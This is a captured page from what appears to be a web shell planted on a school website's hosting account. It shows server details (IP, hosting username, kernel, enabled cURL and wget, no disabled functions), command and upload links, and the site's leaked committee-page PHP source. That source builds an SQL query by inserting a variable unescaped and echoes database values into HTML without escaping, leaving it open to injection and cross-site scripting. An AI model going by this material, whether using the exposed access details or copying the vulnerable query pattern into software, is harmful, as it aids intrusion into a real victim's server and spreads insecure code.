|
Server IP : 2a02:4780:3:1493:0:3736:a38e:7 / Your IP : 216.73.216.168 Web Server : LiteSpeed System : Linux sg-nme-web1393.main-hosting.eu 4.18.0-553.77.1.lve.el8.x86_64 #1 SMP Wed Oct 8 14:21:00 UTC 2025 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u926327694/domains/svschool.in/public_html/assets/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
include('header.php');
$news_letter_class = "newsletter-area-2";
?>
<section class="page-banner">
<div class="page-banner-bg bg_cover" >
<div class="container">
<h2 class="about-title custom_title"><span>Committee</span></h2>
</div>
</div>
</section>
<section class="">
<div class="container">
<div class="event-details-content mb-50">
<div class="event-schedule-table table-responsive" style="margin-top:20px;">
<?php
$query_mng = mysqli_query($con,"select committee from committee where is_active=1 group by committee order by order_by");
while($res_mng = mysqli_fetch_array($query_mng))
{
$cname = $res_mng['committee'];
?>
<h6 class="mb-10 mt-20"><?php echo $cname; ?></h6>
<table class="table">
<thead>
<tr>
<th>Committee</th>
<th>Name</th>
<th>Designation</th>
<th>Others</th>
</tr>
</thead>
<tbody>
<?php
$query_mng1 = mysqli_query($con,"select * from committee where committee='$cname' order by order_by");
while($res_mng1 = mysqli_fetch_array($query_mng1))
{
?>
<tr>
<td><?php echo $res_mng1['committee']; ?></td>
<td><?php echo $res_mng1['name']; ?></td>
<td><?php echo $res_mng1['designation']; ?></td>
<td><?php echo $res_mng1['others']; ?></td>
</tr>
<?php
}
?>
</tbody>
</table>
<?php
}
?>
</div>
</div>
</div>
</section>
<?php include('footer.php'); ?>